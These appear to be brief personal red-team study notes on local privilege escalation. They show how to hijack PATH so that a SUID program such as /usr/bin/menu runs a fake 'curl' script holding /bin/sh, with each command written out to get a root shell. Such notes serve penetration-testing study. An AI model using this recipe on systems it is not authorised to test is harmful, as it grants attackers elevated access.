Temp Notes for Red Teaming

Created: 28.07.2022




Say, for example, that some utility has this bit set. That means that the utility has elevated permissions. You might get lucky; check the executable with strings for some commands. If you see some system utility without a full path, you can create a script in the same location and it will be run instead.

# check which system utility to override
strings /usr/bin/menu

# create a script file with the same name as a system utility
echo /bin/sh > curl

# give it rwx permissions 
chmod 777 curl 

# add the directory to PATH env variable so that the system checks this location for curl when the program is run
export PATH=/tmp:$PATH

# run the program


